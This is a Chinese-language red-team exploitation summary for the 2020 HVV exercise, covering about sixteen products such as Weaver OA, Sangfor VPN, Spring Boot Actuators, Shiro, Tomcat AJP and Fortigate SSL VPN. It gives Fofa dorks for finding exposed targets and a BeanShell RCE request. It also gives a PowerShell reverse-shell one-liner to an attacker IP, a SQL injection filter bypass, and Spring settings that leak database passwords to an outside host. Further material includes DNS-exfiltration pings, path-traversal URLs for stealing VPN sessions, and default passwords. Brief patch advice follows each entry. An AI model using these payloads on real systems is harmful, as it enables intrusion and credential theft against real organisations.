2020HVV红方漏洞利用总结

  • A+
所属分类:安全文章

2020HVV红方漏洞利用总结

文章来源:乌云安全

一年一度的HVV开始了,结合网上已公布的POC,总结了一部分最新的漏洞利用及修复方式,供大家参考。

1

泛微OA Bsh 远程代码执行漏洞

1. 漏洞简介

2019年9月17日泛微OA官方更新了一个远程代码执行漏洞补丁, 泛微e-cology OA系统的Java Beanshell接口可被未授权访问, 攻击者调用该Beanshell接口, 可构造特定的HTTP请求绕过泛微本身一些安全限制从而达成远程命令执行, 漏洞等级严重.

2. 影响组件泛微OA

3. 漏洞指纹

Set-Cookie: ecology_JSessionId=ecology/weaver/bsh.servlet.BshServlet

4. Fofa Dork

app="泛微-协同办公OA"

5. 漏洞分析

泛微OA E-cology远程代码执行漏洞原理分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/215218.html

https://github.com/beanshell/beanshell

http://beanshell.org/manual/quickstart.html#The_BeanShell_GUI

6. 漏洞利用

Vulnerability-analysis/0917/weaver-oa/CNVD-2019-32204 at master · myzing00/Vulnerability-analysis
https://github.com/myzing00/Vulnerability-analysis/tree/master/0917/weaver-oa/CNVD-2019-32204

POST /weaver/bsh.servlet.BshServlet HTTP/1.1

Host: xxxxxxxx:8088

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 98

Content-Type: application/x-www-form-urlencoded

bsh.script=eval%00("ex"%2b"ec("whoami")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

7. 利用技巧

1.其他形式绕过

eval%00("ex"%2b"ec("whoami")"); 也可以换成 exu0065c("cmd /c dir");

2.泛微多数都是windows环境, 反弹shell可以使用pcat

Powershell

IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd

8. 防护方法

1.及时更新泛微补丁

2.拦截/weaver/bsh.servlet.BshServlet目录的访问

2

泛微OA e-cology SQL注入漏洞

1. 漏洞简介

泛微OA在国内的用户很多,漏洞以前也很多,但现在在漏洞盒子托管了企业SRC https://weaversrc.vulbox.com/, 情况有所好转

2. 影响组件

泛微OA

3. 漏洞指纹

Set-Cookie: ecology_JSessionId=

ecology

WorkflowCenterTreeData

/mobile/plugin/SyncUserInfo.jsp

4. Fofa Dork

app="泛微-协同办公OA"

5. 漏洞分析

泛微OA WorkflowCenterTreeData接口注入漏洞(限oracle数据库) – 先知社区
https://xz.aliyun.com/t/6531

6. 漏洞利用

泛微OA e-cology WorkflowCenterTreeData前台接口SQL注入漏洞复现数据库小龙人-CSDN博客
https://blog.csdn.net/zycdn/article/details/102494037

Tentacle/ecology8_mobile_sql_inject.py at 6e1cecd52b10526c4851a26249339367101b3ca2 · orleven/Tentacle
https://github.com/orleven/Tentacle/blob/6e1cecd52b10526c4851a26249339367101b3ca2/script/ecology/ecology8_mobile_sql_inject.py

应用安全 – 软件漏洞 – 泛微OA漏洞汇总 – AdreamWillB – 博客园
https://www.cnblogs.com/AtesetEnginner/p/11558469.html

/mobile/plugin/SyncUserInfo.jsp 这个也是有问题的, 但由于没有公开的分析报告, 漏洞相对简单, 这里不过多描述

7. 利用技巧

1.在这个漏洞补丁之前大概有几十个前台注入, 都差不多, 因为没公开这里就不细说了

2.泛微的补丁中间改过一次过滤策略, 打完所有补丁的话, 注入就很难了

3.这里可以绕过的原因是泛微某个过滤器初始化错误,当长度超过xssMaxLength=500的时候就不进入安全检测, 修复以后是xssMaxLength=1000000,所以随便你填充%0a%0d还是空格都可以绕过注入检测

4.泛微后端数据库版本存在差异, 但是可以通用检测。已知泛微OA E8存在2个版本的数据库, 一个是mssql, 一个是oracle, 且新旧版本泛微的sql过滤方法并不一致所以这里筛选出一个相对通用的检测手法(下面代码是python的" "*800 800个空格)

"-1) "+" "*800+ "union select/**/1, Null, Null, Null, Null, Null, Null, Null from Hrmresourcemanager where loginid=('sysadmin'"

老版本可以在关键字后面加 /**/ 来绕过sql检测

新版本可以通过加入大量空格/换行来绕过sql检测mssql,oracle中都有Hrmresourcemanager , 这是管理员信息表

Hrmresource表中没有用户, Hrmresourcemanager 表中也一定会存在sysadmin账户,所以进行union select的时候一定会有数据。这里也可以使用 "-1) "+" "*800+ " or/**/ 1=1 and id<(5",这里使用 <5 可以避免信息超过5条, 但是会返回密码等敏感信息, 不建议使用。

8. 防护方法

1.及时更新泛微补丁
2.泛微最好不要开放到公网
3.使用waf拦击

3

深信服VPN远程代码执行

1. 漏洞简介

深信服 VPN 某个特定产品存在远程代码执行, 2019 攻防演练使用过

2. 影响组件深信服 VPN

3. 漏洞指纹

Set-Cookie: TWFID=welcome to ssl vpn Sinfor

4. Fofa Dork

header="Set-Cookie: TWFID="

5. 漏洞分析

深信服vpnweb登录逆向学习 – potatso – 博客园
https://www.cnblogs.com/potatsoSec/p/12326356.html

6. 漏洞利用

wget -t %d -T %d --spider %s

7. 利用技巧

1.该版本深信服VPN属于相对早期的版本, 大概2008年左右, 但目前还有761个ip开放在公网

2.该版本较低, whomai不存在, 可以使用 uname, 这里没有空格可dns传出来

3.去除空格也简单 cat /etc/passwd | tr " n" "+|"

8. 防护方法

1.及时更新补丁

2.升级到最新版

4

深信服 VPN 口令爆破

1. 漏洞简介

深信服 VPN 针对口令爆破是5次错误锁定IP五分钟, 所以这里爆破也不是不行, 主要是测试常见弱口令以及分布式爆破也不是不行

2. 影响组件深信服 VPN

3. 漏洞指纹

/por/login_auth.csp?apiversion=1sangfor/cgi-bin/login.cgi?rnd=

4. Fofa Dork

app="深信服-SSL-VPN"

5. 漏洞分析

关于SSL VPN认证时的验证码绕过 – SSL VPN/EMM – 深信服社区
https://bbs.sangfor.com.cn/forum.php?mod=viewthread&tid=20633

此处存疑, 时间问题没有测试

6. 漏洞利用

1.深信服VPN 口令爆破 demo (这里仅测试了M6,其他的应该差不多)

#encoding=utf8

import requests

import hashlib

import urllib3

urllib3.disable_warnings()

import re

session = requests.session()

def SanForLogin(target, password, username="admin"):

    # 加密密码的算法是 sha1(password+sid)

    # 没有公开POC就不写了

SanForLogin("https://xxxxxxxxxxx/", "admin")

7. 利用技巧

1.由于深信服涉及的版本跨度时间达十几年, 很多地方不一样, 但是总体都差不太多

国外APT组织应该也批量爆破了一波,加密的密码也就是 sha1(password+sid)

爆破也就锁一会ip, 夜里丢一边跑着就完事了, 弱口令也就那么些admin/123456/Sangfor/[email protected]

2.如果爆破出来了管理员密码, 管理员后台有好多处命令注入, 比如升级工具, 这里讲起来应该是正常功能

3.去年传闻还有前台sql注入, 但是没拿到补丁, 手头没环境, 就没分析, 看一下乌云上的老洞吧。深信服SSLVPN外置数据中心敏感信息泄漏&SQL注入漏洞可导致getshell
https://www.uedbox.com/post/31092/

8. 防护方法

1.及时更新补丁

2.升级到最新版

5

边界产品(防火墙, 网关, 路由器, VPN) 相关漏洞

1. 漏洞简介

大型企业往往会配置一些边界设备来维护企业内外网通信, 这里也存在灯下黑的问题, 由于多数不开源, 漏洞主要以弱口令为主

2. 影响组件

防火墙, 网关, 路由器, VPN

3. 漏洞指纹

防火墙, 网关, 路由器, VPN

4. Fofa Dork防火墙, 网关, 路由器, VPN 的名称

5. 漏洞分析

【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html

渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA

6. 漏洞利用

【安全设备】常见网络安全设备默认口令|IT2021.Com
https://www.it2021.com/security/614.html

渗透测试之各厂商防火墙登录IP、初始密码、技术支持
https://mp.weixin.qq.com/s/OLf7QDl6qcsy2FOqCQ2icA

7. 利用技巧

1.这个东西好多人不改默认口令, 就算改很多也是企业特色弱口令

admin root 123456 永远的神

内网的安全平台就是个漏洞指南

8. 防护方法

1.设置强口令

2.限制来源IP

6

Thinkphp 相关漏洞

1. 漏洞简介

Thinkphp 是国内很常见的PHP框架, 存在 远程代码执行/sql注入/反序列化/日志文件泄露等问题

2. 影响组件
Thinkphp

3. 漏洞指纹

Thinkphp X-Powered-By: ThinkPHP

4. Fofa Dork

app="ThinkPHP"

5. 漏洞分析

ThinkPHP漏洞总结 – 赛克社区
http://zone.secevery.com/article/1165

挖掘暗藏ThinkPHP中的反序列利用链 – 斗象能力中心
https://blog.riskivy.com/%E6%8C%96%E6%8E%98%E6%9A%97%E8%97%8Fthinkphp%E4%B8%AD%E7%9A%84%E5%8F%8D%E5%BA%8F%E5%88%97%E5%88%A9%E7%94%A8%E9%93%BE/

ThinkPHP使用不当可能造成敏感信息泄露PHP_Fly鹏程万里-CSDN博客
https://blog.csdn.net/Fly_hps/article/details/81201904

DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461

6. 漏洞利用

SkyBlueEternal/thinkphp-RCE-POC-Collection: thinkphp v5.x 远程代码执行漏洞-POC集合
https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

Dido1960/thinkphp: thinkphp反序列化漏洞复现及POC编写
https://github.com/Dido1960/thinkphp

whirlwind110/tphack: Thinkphp3/5 Log文件泄漏利用工具
https://github.com/whirlwind110/tphack

7. 利用技巧

1.遇到Thinkphp的站点看一下版本, 或者直接扫一下, 看看有没有rce, 或者日志文件泄露

2.自从挖了thinphp的反序列化利用链以后, 这类型考题经常出没在ctf中

3.实战中也看到偶尔有可以利用的情况, 运气好可能有惊喜, 刚好有篇新出的文章中使用到了这个漏洞

DSMall代码审计 – 安全客,安全资讯平台
https://www.anquanke.com/post/id/203461

8. 防护方法

1.及时更新补丁

2.升级到最新版Thinkphp

3.前置WAF进行防护

7

Spring 系列漏洞

1. 漏洞简介

Spring 是java web里最最最最常见的组件了, 自然也是研究的热门, 好用的漏洞主要是Spring Boot Actuators 反序列化, 火起来之前用了一两年, 效果很棒

2. 影响组件
Spring xxx

3. 漏洞指纹

X-Application-Context:

4. Fofa Dork

app="Spring-Framework"

5. 漏洞分析

Spring 框架漏洞集合 ~ Misaki’s Blog
https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/

Exploiting Spring Boot Actuators | Veracode blog
https://www.veracode.com/blog/research/exploiting-spring-boot-actuators

Spring Boot Actuators配置不当导致RCE漏洞复现 – JF ‘ blog
https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Spring%20Boot%20Actuators%E9%85%8D%E7%BD%AE%E4%B8%8D%E5%BD%93%E5%AF%BC%E8%87%B4RCE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

6. 漏洞利用

mpgn/Spring-Boot-Actuator-Exploit: Spring Boot Actuator (jolokia) XXE/RCE
https://github.com/mpgn/Spring-Boot-Actuator-Exploit

artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads
https://github.com/artsploit/yaml-payload

7. 利用技巧

1.Spring Boot Actuators 相关漏洞超级好用,很多厂商一开始都不懂, 直接对外开放Spring Boot Actuators, 造成了有一段时间每个用了Spring Boot的厂商都出了问题,尤其是现在很多厂商使用微服务框架, 通过网关进行路由分发, 一些子目录通常对应一个Spring Boot启动的服务。然后子目录比如 http://123.123.123.123/admin/env , http://123.123.123.123/manager/env也都是可以出现的/env 可以偷session, RCE/heapdump 可以直接dump jvm中的对象, 使用 jhat 可以读取里面的对象可以遍历如下的endpoint, 1.x 2.x的目录不一样, 所以都覆盖了一下

/trace

/health

/loggers

/metrics

/autoconfig

/heapdump

/threaddump

/env

/info

/dump

/configprops

/mappings

/auditevents

/beans

/jolokia

/cloudfoundryapplication

/hystrix.stream

/actuator

/actuator/auditevents

/actuator/beans

/actuator/health

/actuator/conditions

/actuator/configprops

/actuator/env

/actuator/info

/actuator/loggers

/actuator/heapdump

/actuator/threaddump

/actuator/metrics

/actuator/scheduledtasks

/actuator/httptrace

/actuator/mappings

/actuator/jolokia

/actuator/hystrix.stream

/monitor

/monitor/auditevents

/monitor/beans

/monitor/health

/monitor/conditions

/monitor/configprops

/monitor/env

/monitor/info

/monitor/loggers

/monitor/heapdump

/monitor/threaddump

/monitor/metrics

/monitor/scheduledtasks

/monitor/httptrace

/monitor/mappings

/monitor/jolokia

/monitor/hystrix.stream

这里通过 /env + /refresh 进行rce应该还有其他利用手法, 当spring boot reload的时候会进行一些默认操作,里面就有操作空间, 很像fastjson反序列化。

2.就算实在不能RCE, 这里也有个技巧可以偷取 Spring 配置文件中的加密字段, 偷一下生产环境的密码/key也ok

eureka.client.serviceUrl.defaultZone=http://${somedb.pasword}@127.0.0.1:5000

spring.cloud.bootstrap.location=http://${somedb.password}@artsploit.com/yaml-payload.yml

3.尤其是使用spring eureka做集群的时候, 通常拿到一台服务器, 就可以传递恶意注册到其他server, 从而感染整个微服务集群eureka 通常是 server 也是 client, 无论对方请求什么都直接返回恶意序列化xml就可以了

8. 防护方法

1.及时更新补丁

2.开启Spring Boot Actuators权限校验

3.前置WAF进行防护

8

Solr 系列漏洞

1. 漏洞简介

Solr 是企业常见的全文搜索服务, 这两年也爆出很多安全漏洞,

2. 影响组件

Solr

3. 漏洞指纹

Solr

4. Fofa Dork

app="Solr"

5. 漏洞分析

Apache Solr最新RCE漏洞分析 – FreeBuf互联网安全新媒体平台
https://www.freebuf.com/vuls/218730.html

Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
https://paper.seebug.org/1009/

6. 漏洞利用

veracode-research/solr-injection: Apache Solr Injection Research
https://github.com/veracode-research/solr-injection

jas502n/CVE-2019-12409: Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS=”true”)
https://github.com/jas502n/CVE-2019-12409

mogwailabs/mjet: MOGWAI LABS JMX exploitation toolkit
https://github.com/mogwailabs/mjet

7. 利用技巧

1.看到锤就完事了, 漏洞太多了, 一片一片的

2.遇到mjet连接超时,这是目标服务起返回了错误的stub(内网地址, 常见于docker), 可以使用socat进行流量转发, 后记里面有具体操作

8. 防护方法

1.升级到最新版

2.不要对外开放敏感端口

9

Ghostscript 上传图片代码执行

1. 漏洞简介

Ghostscript 是图像处理中十分常用的库, 集成在imagemagick等多个开源组件中, 其 .ps文件存在沙箱绕过导致代码执行的问题影响广泛, 由于上传图片就有可能代码执行, 很多大厂中招

2. 影响组件

imagemagick, libmagick, graphicsmagick, gimp, python-matplotlib, texlive-core, texmacs, latex2html, latex2rtf 等图像处理应用

3. 漏洞指纹

.ps/.jpg/.png

4. Fofa Dork

5. 漏洞分析

ghostscript命令执行漏洞预警 – 安全客, 安全资讯平台
https://www.anquanke.com/post/id/157513

6. 漏洞利用

Exploit Database Search
https://www.exploit-db.com/search?q=Ghostscript

vulhub/ghostscript/CVE-2019-6116 at master · vulhub/vulhub
https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116

7. 利用技巧

1.如果发现网站可以上传图片, 且图片没有经过裁剪, 最后返回缩略图, 这里就可能存在Ghostscript 上传图片代码执行dnslog 可以用 ping `uname`.admin.ceye.io 或 ping `whoami`.admin.ceye.io保存成图片, 以后用起来方便, 有个版本的 centos 和 ubuntu poc还不一样, 可以这样构造ping `whoami`.centos.admin.ceye.io / ping `whoami`.ubuntu.admin.ceye.io分别命名为 centos_ps.jpg/ubuntu_ps.jpg, 这样测试的时候直接传2个文件, 通过DNSLOG可以区分是哪个poc执行的

8. 防护方法

1.升级到最新版


Apache Shiro RememberMe 反序列化导致的命令执行漏洞 (Shiro-550, CVE-2016-4437)

1. 漏洞简介

Apache Shiro 是企业常见的Java安全框架, 其漏洞在2019年攻防演练中起到显著作用

2. 影响组件

Apache Shiro (由于密钥泄露的问题, 部分高于1.2.4版本的Shiro也会受到影响)

3. 漏洞指纹

set-Cookie:rememberMe=deleteMe或者URL中有shiro字样有一些时候服务器不会主动返回 rememberMe=deleteMe, 直接发包即可

4. Fofa Dork

app="Apache-Shiro"

5. 漏洞分析

漏洞分析:Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞

https://paper.seebug.org/shiro-rememberme-1-2-4/

6. 漏洞利用

wyzxxz/shiro_rce:shiro rce反序列命令执行一键工具

https://github.com/wyzxxz/shiro_rce

Apache Shiro回显poc改造计划

https://mp.weixin.qq.com/s/-ODg9xL838wro2S_NK30bw

7. 利用技巧

1.使用多个泄露的key进行遍历, 这个在实战中确实有效

关于Shiro反序列化漏洞的延伸—升级shiro也能被shell
https://mp.weixin.qq.com/s/NRx-rDBEFEbZYrfnRw2iDw

Shiro 100 Key
https://mp.weixin.qq.com/s/sclSe2hWfhv8RZvQCuI8LA

2.使用URLDNS进行检测提速

使用适应性最强的URLDNS(这个不受JDK版本和安全策略影响, 除非网络限制不能出DNS)进行检测且可以使用ysoserial提前生成序列化内容java-jartarget/ysoserial-0.0.5-SNAPSHOT-all.jarURLDNS "http://1234567890.test.ceye.io" > urldns.ser然后使用占位符+目标url hash的方法修改序列化内容中的urldns地址提高检测速度以及后续检测无需使用ysoserial

例如1234567890.test.ceye.io可以换成md5('www.qq.com').hexdigest() [:10].test.ceye.io也就是9d2c68d82d.test.ceye.io可以预先记录hash9d2c68d82d www.qq.com然后进行hash查表就可以知道是DNSLOG来自哪个目标,性能会提高不少

3.已知目标使用了Shiro,可以采取Shiro-721的报错逻辑来进行遍历key这样即使DNS不能出网,也可以通过是否返回rememberMe=deleteMe来断定shiro key的正确性, 前提是服务器有rememberMe=deleteMe相关回显

8. 防护方法

1.升级Shiro到最新版

2.升级对应JDK版本到 8u191/7u201/6u211/11.0.1 以上

3.WAF拦截Cookie中长度过大的rememberMe值

10

通达OA 远程代码执行漏洞

1. 漏洞简介

通达OA 在国内的用户也比较多, 虽说代码加了密, 奈何是Zend5.4, 解码很简单, 然后代码中的漏洞就很清楚, 尤其是变量覆盖和注入

2. 影响组件

通达OA

3. 漏洞指纹

"/images/tongda.ico">

Office Anywhere 20xx版网络智能办公系统

/ispirit/interface/gateway.php

4. Fofa Dork

app="通达OA"

5. 漏洞分析

note/readme.md at c28f7b232ad5f0ff7ccc672bbedcd34e9e3cca86 leezp/note
https://github.com/leezp/note/blob/c28f7b232ad5f0ff7ccc672bbedcd34e9e3cca86/20200313%E9%80%9A%E8%BE%BEOA/readme.md

代码审计 | 通达OA 任意用户登录漏洞(匿名RCE)分析 | zrools
https://www.zrools.org/2020/04/23/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1-%E9%80%9A%E8%BE%BEOA-%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E%EF%BC%88%E5%8C%BF%E5%90%8DRCE%EF%BC%89%E5%88%86%E6%9E%90/

6. 漏洞利用

NS-Sp4ce/TongDaOA-Fake-User: 通达OA 任意用户登录漏洞
https://github.com/NS-Sp4ce/TongDaOA-Fake-User

tools/tongda_v11.4_rce_exp.py at master · zrools/tools 管理员伪造后sql写shell
https://github.com/zrools/tools/blob/master/python/tongda_v11.4_rce_exp.py

7. 利用技巧

1.这个漏洞也很简单, 发预警的当天就分析出来了,一个上传,一个包含, 主要是文件包含漏洞的/ispirit/interface/gateway.php文件在v11才有绕过disable_function也很简单, 直接调用COM('WScript.shell')组件就ok了

2.文件名结构规则如下

[email protected]_ 2055499620|123. php.

对应文件名为

attach/im/2003/2055499620.123.php

因为是windows的,1.php.可以绕过黑名单,写到文件就成了1.php 

3.2020年4月20号爆出任意用户伪造登录, 这里小伙伴测试 2017 和 v11 的 poc 好像可以用

通达OA前台任意用户伪造登录漏洞
https://vas.riskivy.com/vuln-detail?id=33

NS-Sp4ce/TongDaOA-Fake-User: 通达OA 任意用户登录漏洞
https://github.com/NS-Sp4ce/TongDaOA-Fake-User

8. 防护方法

1.及时更新补丁

2.使用waf拦截

11

致远OA 帆软报表 seeyonreport 远程代码执行

1. 漏洞简介

帆软报表 (seeyonreport) 很多时候会跟合致远OA一起出现, 通常用户还不知道, 所以这里有几个漏洞点

2. 影响组件

帆软报表 seeyonreport

3. 漏洞指纹

https://seeyoon.com/seeyonreport/ReportServer?op=fs_load&cmd=fs_signin&_=1560911828892

seeyonreport

4. Fofa Dork

app="用友-致远OA"

5. 漏洞分析

帆软报表v8.0 Getshell漏洞分析 | ADog’s Blog
http://foreversong.cn/archives/1378

6. 漏洞利用

帆软报表v8.0 Getshell漏洞分析 | ADog’s Blog
http://foreversong.cn/archives/1378

xray/finereport-directory-traversal.yml at master chaitin/xray
https://github.com/chaitin/xray/blob/master/pocs/finereport-directory-traversal.yml

7. 利用技巧

1.未设置密码或者读取读取管理员密码
https://seeyoon.com/seeyonreport/ReportServer?op=fs_load&cmd=fs_signin&_=1560911828892

这里很有可能是没有设置密码的, 修改密码进入后台就可以了

如果设置里密码, 尝试这个接口

/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml,读取管理员密码, 然后使用上文的解密程序解密

2.后台getshell

这种后台能装插件的都随便getshell,先去下载一个指定版本的jar包,本地测试环境是9.0,下载com.fr.plugin.external-1.3.4.zip

https://shop.finereport.com/plugin/2d36b210-2a59-4940-8c4f-f3f16d58cd66

http://shopps.finereport.com/com.fr.plugin.external-1.3.4.zip?e=1561433162&token=GYG9vMioxqbEgx-5HoAMAelD0zGdUrXT4UZ3w-d1:N-PeIkhKkjCY7LHdqelnSvp_LmA=编译一个恶意的LocaleFinder.class打包进去,复制LocaleFinder.class

com.fr.plugin.external-1.3.4.zipfr-plugin-external-1.3.4fr-plugin-external-1.3.4.jarcomfrpluginexternallocale进入到插件管理界面,上传符合规范的jar包插件即可没生效就访问一下https://xxxx/seeyonreport/ReportServer?op=im一般后台都是win,可以直接使用powershell进行反弹shellpowershell

IEX(New-Object System.Net.Webclient).

DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');

powercat -c vps_ip -p 6666 -e cmd

8. 防护方法

1.及时更新补丁

2.使用waf拦截

12

SaltStack认证绕过复现

1、漏洞概述

在 CVE-2020-11651认证绕过漏洞中攻击者通过构造恶意请求,可以绕过 Salt Master的验证逻辑,调用相关未授权函数功能,从而可以造成远程命令执行漏洞:
ClearFuncs类会处理非认证的请求和暴露_send_pub()方法,可以用来直接在master publish服务器上对消息进行排队。这些消息可以用来触发minion来以root权限运行任意命令。
ClearFuncs类还会暴露prep_auth_info()方法,该方法会返回用来认证master服务器上本地root用户的命令的root key。然后root key就可以远程调用master 服务器的管理命令。这种无意的暴露提供给远程非认证的攻击者对salt master的与root权限等价的访问权限。

2、影响版本

l SaltStack < 2019.2.4
l SaltStack < 3000.2

3、环境搭建

直接使用vulhub进行搭建
git clone https://github.com/vulhub/vulhub.git
cd /vulhub/saltstack/CVE-2020-11651/
docker-compose up -d

查看环境是否启动docker ps

4、漏洞复现

Poc:

https://github.com/jasperla/CVE-2020-11651-poc

执行前需要安装salt库,需指定salt库版本

pip3 install salt==2019.2.3

读取文件:

python3 exploit.py --master 192.168.232.170 -r /etc/passwd

5、修复方式

1、SaltStack官方已发布最新版本修复此漏洞,建议相关用户及时更新至安全版本及其以上,并开启SaltStack自动更新,以便实时获取补丁或升级至安全版本:https://repo.saltstack.com/
2、禁止将Salt Master默认监听端口(4505、4506)向公网开放,并设置为仅对可信对象开放。

13

Windows DNS Server蠕虫级远程代码执行漏洞

1、漏洞详情

Windows DNS Server 是 Windows Server 服务器上一项重要功能组件。负责域内主机的所有DNS相关服务的调度和处理。远程攻击者可不经过身份验证,向受影响的服务器发送特制的请求包,最终触发该漏洞,成功利用此漏洞的攻击者可在受影响的系统上执行任意代码。进而控制其他相连通的服务造成严重危害。

2、影响版本

  • Windows Server 2008 for 32-bit Systems Service Pack 2

  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

  • Windows Server 2008 for x64-based Systems Service Pack 2

  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core inastallation)

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1

  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core  installation)

  • Windows Server 2012

  • Windows Server 2012 (Server Core installation)

  • Windows Server 2012 R2

  • Windows Server 2012 R2 (Server Core installation)

  • Windows Server 2016

  • Windows Server 2016 (Server Core installation)

  • Windows Server 2019

  • Windows Server 2019 (Server Core installation)

  • Windows Server version 1909 (Server Core installation)

  • Windows Server version 1903 (Server Core installation)

  • Windows Server version 2004 (Server Core installation)

3、利用场景

(1)受害者访问攻击者域名"evil.server.io"
(2)本地DNS服务器或域内的DNS服务器无法解析"evil.server.io",向google DNS服务器(如8.8.8.8)查询
(3)查到后,发现该域名可以由攻击者DNS服务器解析,所以将该信息缓存到域服务器上
(4)第二次查询时,直接和攻击者DNS服务器进行查询
(5)此时攻击者服务器就可以构造响应包触发漏洞

EXP:CVE-2020-1350 (SIGRed) - Windows DNS DoS Exploit

https://github.com/maxpl0it/CVE-2020-1350-DoS

4、修复建议

微软提供了临时的缓解措施:

修改注册表

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters值:TcpReceivePacketSize 数据类型 DWORD = 0xFF00

注意:必须重新启动 DNS 服务才能生效。

有关更多信息,请参阅 KB4569509:DNS 服务器漏洞 CVE-2020-1350 指南:
https://support.microsoft.com/zh-cn/help/4569509/windows-dns-server-remote-code-execution-vulnerability

若要移除此临时解决方法:

应用修补程序后,管理员可以移除值 TcpReceivePacketSize 及其数据,以使注册表项

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSParameters 下的所有其他内容与之前保持相同。

手动升级方案:

通过如下链接自行寻找符合操作系统版本的漏洞补丁,并进行补丁下载安装。

CVE-2020-1350 | Windows DNS 服务器远程执行代码漏洞

https://portal.msrc.microsoft.com/zh-CN/security-guidance/advisory/CVE-2020-1350

14

Tomcat 本地文件包含漏洞 (CVE-2020-1938)

1. 漏洞简介

Tomcat 是常见的Web 容器, 用户量非常巨大, Tomcat 8009 ajp端口一直是默认开放的, 这个漏洞存在很多年了, 这次应该有奇效

2. 影响组件

Apache Tomcat 6

Apache Tomcat 7 < 7.0.100

Apache Tomcat 8 < 8.5.51

Apache Tomcat 9 < 9.0.31

3. Fofa Dork

protocol="ajp"

4. 漏洞分析

Apache Tomcat AJP协议文件包含漏洞分析–斗象能力中心

https://blog.riskivy.com/apache-tomcat-ajp%e5%8d%8f%e8%ae%ae%e6%96%87%e4%bb%b6%e5%8c%85%e5%90%ab%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/

5、漏洞利用

0nise/CVE-2020-1938: CVE-2020-1938
https://github.com/0nise/CVE-2020-1938

6. 利用技巧

1.当时还没公开poc的时候就分析出来exp挺有意思的, 效果确实还可以, 当天fofa都被累挂了

主要代码也就这t = Tomcat("127.0.0.1", 8009)

_, data = t.perform_request('/',

attributes=[{'name': 'req_attribute',

'value': ['javax.servlet.include.request_uri', '/']

},

{'name': 'req_attribute',

'value': ['javax.servlet.include.path_info',

 "/WEB-INF/web.xml"]

},

{'name': 'req_attribute',

'value': ['javax.servlet.include.servlet_path',

 '/']

},

])

print('----------------------------')

print("".join([bytes.decode(d.data) for d in data]))

2.通过修改这里的路径可以进行Webapp切换, 默认是ROOT/, 需要切换应用就改成/admin/

3.通常检测的时候,尽量保持t.perform_request('/',有的poc喜欢用/addsd这种的不存在的路径, 有些情况会读不到文件

8. 防护方法

1.升级到最新版

2.屏蔽8009端口对外开放

15

Fortigate SSL VPN 文件读取/远程代码执行

1. 漏洞简介

Fortigate SSL VPN 在全球用户量巨大, 去年橘子哥发现了文件读取和远程代码执行漏洞

2. 影响组件
Fortigate SSL VPN

3. 漏洞指纹

Fortigate

4tinet2095866

4. Fofa Dork

"Fortigate" && port=10443

5. 漏洞分析

Orange: Attacking SSL VPN – Part 2: Breaking the Fortigate SSL VPN
https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html?m=1

6. 漏洞利用

密码读取

milo2012/CVE-2018-13379: CVE-2018-13379
https://github.com/milo2012/CVE-2018-13379

任意密码重置, 这肯定是个后门

milo2012/CVE-2018-13382: CVE-2018-13382
https://github.com/milo2012/CVE-2018-13382

7. 利用技巧

1.文件读取的路径构造

https://xxxxxx:10443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession

如下padding可以构造出来任意文件读取, 可以读取其他文件, 注意这个系统好像没有/etc/passwd print("/../../../../"+(raw_input().rjust(35, '/')))

2.寻找魔术数字

虽然当时橘子哥没有公开魔术数字, 但是当时随手分析了一下下面这个启动文件, 搜索一下magic就找到 4tinet2095866,

https://xxxxxxxx:10443/remote/fgt_lang?lang=/../../../../////////////////////////bin/sslvpnd

后来发现这个字符串在js里面也有, 直接从前台分析也可以获得

https://xxxxx:10443/sslvpn/js/lgin.js?q=5f9a6877fd1f78da768239aae6e739c2

8. 防护方法

1.及时更新补丁

2.升级到最新版

16

齐治堡垒机相关漏洞

1. 漏洞简介

齐治堡垒机是国内使用比较多的堡垒机产品, 后端使用PHP编写

2. 影响组件

齐治堡垒机

3. 漏洞指纹

shterm

4. Fofa Dork

app="shterm-堡垒机"

5. 漏洞分析

审计某系统从解密到GetShell–云+社区–腾讯云
https://cloud.tencent.com/developer/article/1448700

齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)分析–开发笔记
http://kfbiji.com/article/65b98114903248eb

6. 漏洞利用

齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)分析–开发笔记
http://kfbiji.com/article/65b98114903248eb

7. 利用技巧

1.齐治堡垒机默认口令:shterm/shterm

2.普通用户获取堡垒机权限, 登录之后可尝试命令注入

